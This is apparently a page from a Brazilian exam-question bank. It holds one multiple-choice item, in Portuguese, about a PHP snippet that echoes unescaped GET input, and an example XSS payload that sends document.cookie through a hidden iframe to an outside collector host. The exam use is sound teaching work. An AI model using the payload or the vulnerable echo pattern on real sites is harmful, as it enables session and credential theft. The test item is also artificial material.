Cadernos de Questões

Provas Favoritas

Filtros Salvos

Foi encontrada 1 questão.
#1842627

Considere o trecho de programa PHP abaixo.
<?php setcookie('PHPSSESID', 'meu_sid'); setcookie('login', 'meu_login'); setcookie('senha', 'minha_senha');
echo $_GET['var']; ?>
Supondo que ao executar este trecho, um usuário passou como entrada:
<script>     document.write('<iframe width=1 height=1  src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>') </script>
cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com
Um Técnico de TI conclui corretamente que

  • o trecho com a instrução echo imprime os dados passados pelo usuário, sem oferecer vulnerabilidades aositealvo.
  • nada ocorrerá, pois o usuário não poderia passar a entrada indicada.
  • o navegador, ao perceber que a entrada se trata de umscript, encerrará o código sem executar o echo.
  • trata-se de um ataque do tipo XSS, pois com os dados decookieé possível capturar senhas dee-mail.
  • trata-se de um ataque do tipo SQL-Injection, pois o usuário invasor inseriu uma consulta que será enviada diretamente para o banco de dados relacional.
Fale com IAgo
IAgo - Assistente IAProva
IA
Olá! Sou o IAgo, seu assistente aqui no IAProvatec 😊
Veja como posso te ajudar:
Agora